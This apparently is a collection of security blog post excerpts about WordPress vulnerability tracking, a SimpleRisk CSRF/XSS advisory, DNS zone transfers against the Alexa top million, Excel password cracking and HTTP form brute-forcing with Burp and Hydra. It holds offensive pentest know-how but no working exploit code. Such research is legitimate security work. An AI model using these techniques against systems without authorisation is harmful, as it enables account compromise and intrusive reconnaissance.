WPScan Vulnerability Database

I am pleased to announce that I launched the WPScan Vulnerability Database, a WordPress Vulnerability Database, last week during the BruCON security conference in Ghent, Belgium. The WPScan Vulnerability Database's development was funded by BruCON's 5by5 project, talked about in a previous post.

WPScan and WordPress Security Interview

I was asked to do an interview about WPScan and WordPress security in general. Thought I'd share it here too.

BruCON 5by5 - WPScan Online Vulnerability Database

For those of you who have been living under a rock, BruCON is a security conference held every year in Belgium (originally Brussels, now Ghent). I have attended every BruCON conference since the second. Last year was the 5th time the conference had been held (correct me if I'm wrong) and so the year before (2012) they setup what they called 5by5. This allowed BruCON, as it's a non-for-profit, to share its extra left over cash by supporting community projects. Last year, they allocated up to 5,000 euros to 4 different community projects. These projects were: 1. OWASP OWTF (Abraham Aranguren) 2. The Cloudbug Project (Carlos Garcia Prado) 3. A tool a month (Robin Wood) 4. Eccentric Authentication (Guido Witmond) As last year was such a success, they're doing it again this year! And this year I put in a proposal!

What passwords is GitHub banning?

GitHub was recently the target of a large weak password brute force attack which involved 40k unique IP addresses. One of many of the security measures GitHub has now taken is to ban users to register with 'commonly-used weak passwords'. To find out what GitHub considers as 'commonly-used weak passwords' I decided to compile a list of GitHub valid passwords from a few password lists found online and one of my own. GitHub's password policy is reasonable (at least 7 chars, 1 number and 1 letter) so from all of the wordlists used only 331 passwords were found to conform to GitHub's password policy.

SimpleRisk v.20130915-01 CSRF-XSS Account Compromise

1. *Advisory Information* Title: SimpleRisk v.20130915-01 CSRF-XSS Account Compromise Advisory ID: RS-2013-0001 Date Published: 2013-09-30 2. *Vulnerability Information* Type: Cross-Site Request Forgery (CSRF) [CWE-352, OWASP-A8], Cross-Site Scripting (XSS) [CWE-79, OWASP-A3] Impact: Full Account Compromise Remotely Exploitable: Yes Locally Exploitable: Yes Severity: High CVE-ID: CVE-2013-5748 (CSRF) and CVE-2013-5749 (non-httponly cookie) 3. *Software Description* SimpleRisk a simple and free tool to perform risk management activities. Based entirely on open source technologies and sporting a Mozilla Public License 2.0, a SimpleRisk instance can be stood up in minutes and instantly provides the security professional with the ability to submit risks, plan mitigations, facilitate management reviews, prioritize for project planning, and track regular reviews. It is highly configurable and includes dynamic reporting and the ability to tweak risk formulas on the fly. It is under active development with new features being added all the time. SimpleRisk is truly Enterprise Risk Management simplified. [0] Homepage: http://www.simplerisk.org/ Download: https://simplerisk.googlecode.com/files/simplerisk-20130915-001.tgz

Security Testing HTML5 WebSockets

Recently I became faced with my first Web Application Security Assessment which relied heavily on HTML5's WebSockets. The first clue that the application was using WebSockets was when the application kept giving me a timeout error while using my proxy of choice, Burp Suite. Looking at the HTTP requests/responses in Burp I noticed that a large JavaScript file was requested and downloaded from the server. Within this file I noticed a URL with the ws:// scheme, the WebSocket scheme.

TCP/HTTP?

The initial WebSocket handshake is carried out over HTTP using an 'upgrade request'. After the initial exchange over HTTP all future communication is carried out over TCP. On the application I was testing the WebSocket handshake over HTTP within WireShark looked like this:

Zone Transfers on The Alexa Top 1 Million Part 2

In part 1 of this blog post I conducted a DNS Zone Transfer (axfr) against the top 2000 sites of the Alexa Top 1 Million. I did this to create a better subdomain brute forcing word list. At the time, conducting the Zone Transfer against the top 2000 sites took about 12 hours, this was using a single threaded bash script. I was pretty proud of this achievement at the time and thought that doing the same for the whole top 1 million sites was beyond the time and resources that I had. After creating a multithreaded and parallelised PoC in Ruby to do the Zone Transfers, it took about 5 minutes to conduct the Zone Transfers against the top 2000 compared to the 12 hours it took me to do the top 2000 using a single thread. I decided it was possible to do a Zone Transfer against the whole top 1 million sites. There were 60,472 successful Zone Transfers (%6) out of the Alexa Top 1 Million, this equates to 566MB of raw data on disk. This amount of data brings its own challenges when attempting to manipulate it.

Zone Transfers on The Alexa Top 1 Million

At work as part of every assessment we do a some reconnaissance which includes attempting a DNS Zone Transfer (axfr) and conducting a subdomain brute force on the target domain/s. The subdomain brute force is only as good as your wordlist, the Zone Transfer is a matter of luck. Alexa release a list of the top 1 million sites which is updated on a daily basis. To create a better subdomain wordlist to conduct subdomain brute forcing I attempted a DNS Zone Transfer against the first 2000 sites in the Alexa Top 1 Million list. With every successful Zone Transfer the DNS A records were stored in a CSV file. This was all done using Carlos Perez's dnsrecon DNS enumeration tool. Dnsrecon was ever so slightly modified to only save A records, apart from that I just used a bash script to iterate over the Top 1 Million list and ran dnsrecon's axfr option for each site with CSV output enabled.

Cracking Microsoft Excel 97-2004 .xls Documents

A client emailed to say they had forgotten a password for their Microsoft Excel .xls document and asked if it was possible to recover it. After searching on Google it was clear that there was plenty of shi...bloatware, which may have worked if you were willing to go through a few of them and pay a few dollars. It wasn't that important of a document according to the client but nevertheless a challenge is a challenge. The document was encrypted when using 'save as', according to various sources online the encryption algorithm is 40bit RC4. As it is encrypted nothing could be gleaned by opening the document with a hex editor. As always when Google turns up nothing useful I turn to Twitter. A few people recommended Elcomsoft which do Windows software to both recover and obtain the password of a Microsoft Excel document. This looked like a good bet and they offer free trials! The recover software which seems to do a brute force attack looked like it could have worked (especially now I know how weak the password was) but I was running the software on a Virtual Machine. The recovery tool unfortunately didn't reveal the password, the paid for version may have, I don't know.

Login Cross-Site Request Forgery (CSRF)

The new OWASP Top 10 2013 was released not so long ago, while reading over it I noticed this: "Attackers can trick victims into performing any state changing operation the victim is authorized to perform, e.g., updating account details, making purchases, logout and even login." - https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) This must be a mistake I thought, why would you ever want to CSRF a user to log them into their own account? If you already had their login credentials this must be utterly pointless. Today I came across an academic paper which gives three examples of why Login CSRF can be an issue and how wrong I was. Google "Search History. Many search engines, including Yahoo! and Google, allow their users to opt-in to saving their search history and provide an interface for a user to review his or her personal search history. Search queries contain sensitive details about the user’s interests and activities [41, 4] and could be used by an attacker to embarrass the user, to steal the user’s identity, or to spy on the user. An attacker can spy on a user’s search history by logging the user into the search engine as the attacker; see Figure 1. The user’s search queries are then stored in the attacker’s search history, and the attacker can retrieve the queries by logging into his or her own account."

HTTP Form Password Brute Forcing - The Need for Speed

HTTP Form password brute forcing is not rocket science, you try multiple username/password combinations until you get a correct answer (or non-negative answer). Password brute forcing, especially over a network, takes time and while your software is attempting to find a correct username/password combination it is taking up your and the remote system's resources. While the brute force is being carried out you might not want to run an automated scan, for example, as the remote server may not be able to cope with the amount of connections or the rapid succession of connections. At the same time, your network bandwidth and system memory are also limited. It makes sense that when you conduct a weak password brute force it is done as fast as possible so that your time and resources are restored for other tasks. And of course not forgetting that you're always going to be limited by time on a pentest/web app assessment as the client's budget is never unlimited. So what is the fastest way to brute force a HTTP form today? I use Burp Suite for my Web Application Security Assessments and I would normally use Burp's Intruder, but is this the fastest tool to do it with? Of course, there are other limiting factors when brute forcing remotely such as your Internet/Network speed, CPU speed, RAM and the remote system's response times, as well as other factors. For this experiment we'll only be focusing on the software used to carry out the password brute force attack. This is far from being a perfect in-depth study but it should hopefully give an idea which tool out of my small collection (Burp Intruder Spider Vs Hydra http-post-form) is fastest. The Setup On both tools I set one user to brute force, admin, and used the rockyou-75.txt wordlist (19963 lines), which has one addition which is the correct password which was added to the last line of the file. Both the same username and password list was used for Burp's Intruder (Sniper) and Hydra. Each tool was run one after the other, not at the same time. Burp Suite Professional Intruder (Sniper) Version: 1.5.11 Hydra (http-post-form) Version: 7.4.2 A "Local" test was carried out on a localhost Apache 2 web server as well as a "Remote" test against the www.ethicalhack3r.co.uk Nginx web server. The Test Form that I created to test against (both locally and remotely) does not make a database call which is what would normally be expected on a real HTTP login form. I'd expect my test login form to reply quicker than if it had to make a database call. The 'Local' and 'Remote' columns represent the time it took the tool to find the correct password which was at the end of the wordlist.

SSH "accept : too many open files" on OS X when using Burp

EDIT 19.04.2013 10:17 --- WARNING! This did break the Tor Browser Bundle on my machine. The error was "Couldn't set maximum number of file descriptors: Invalid argument" --- For as long as I can remember, when using SSH as a forward proxy to proxy Burp Suite through an upstream server I have gotten a "accept : too many open files" error in my Mac OS X Terminal after a couple of hours of using Burp's Proxy and/or Scanner. When searching Google the first solution I came across was to set the 'ulimit' to something higher, as far as I can tell 'ulimit' sets user system limits such as how many open files a user is allowed to have open at once. On OS X when attempting to set this limit to 'unlimited' I always got an error, "Neither the hard nor soft limit for "maxfiles" can be unlimited. Please use a numeric parameter for both.", or when setting the ulimit to something higher than the default (256) the error (accept : too many open files) would still not go away or at least not for long. The only thing I found that would get rid of the error was to kill my ssh session and spawn a new one. After further reading, some forums and blogs suggested updating openssh, I did this and the issue persisted. I thought the issue may have been openssl, so I updated that, the issue persisted. I also tweeted about the issue where the suggestion of adjusting the ulimit resurfaced, but I just couldn't get ulimit to fix the issue.

[Weekly Viewing] You and Your Research & Ruby 2.0

This week we have another two videos lined up for you. The first, by Haroon Meer, I was luckily enough to see in person at Brucon 2011. It is one of the best talks I have ever had the privilege to see, by anyone. If you're ever going to watch one of these 'Weekly Viewing' videos of mine make it be this one. The second video is by Matz, the creator of Ruby, where he talks about Ruby's development and the new features of Ruby 2.0. In his talk Matz says that Ruby 1.8 will die soon. So update already! ;)

#HITB2012KUL D1T2 - Haroon Meer - You and Your Research

[Weekly Viewing] Web App Security and Zero Days

This is a first of hopefully many weekly posts in which I will share online security related videos that I've watched during the week and think are worth sharing. This week I've got two great videos lined up for your viewing pleasure.

[OWASP AppSec USA 2012] Effective Approaches to Web Application Security - Zane Lackey

In this video Zane Lackey from Etsy talks about how to make a developer's job easier by making things safe by default, how to detect risky functionality and how to automate aspects of web application security monitoring and response. Effective Approaches to Web Application Security - Zane Lackey from OWASP AppSec USA on Vimeo.

Sony Freedom Of Information (FOI) Request

On the 14th of January the UK Information Commissioner's Office (ICO) sent Sony Computer Entertainment Europe Limited a monetary penalty notice of £250,000 following 'a serious breach of the Data Protection Act'. To be able to quantify how much the ICO was fining Sony for individual user's data the exact number of UK PSN users would need to be known. A couple of sources put this number at 3 million but I'm not sure where the original 3 million figure came from nor how accurate it really is [0][1]. If we were to take this 3 million figure at face value, the ICO fined Sony (£250,000 / 3,000,000) £0.000083 per user's data. According to the ICO, £250,000 is 'reasonable and proportionate' in this case. To get a more accurate figure I sent the ICO a FOI request to ask for the redacted figure in the monetary penalty notice document which simply states "The Network Platform was used by an estimated REDACTED million customers in Europe, the Middle East, Africa, Australia and New Zealand with REDACTED million of those customers based in the UK.".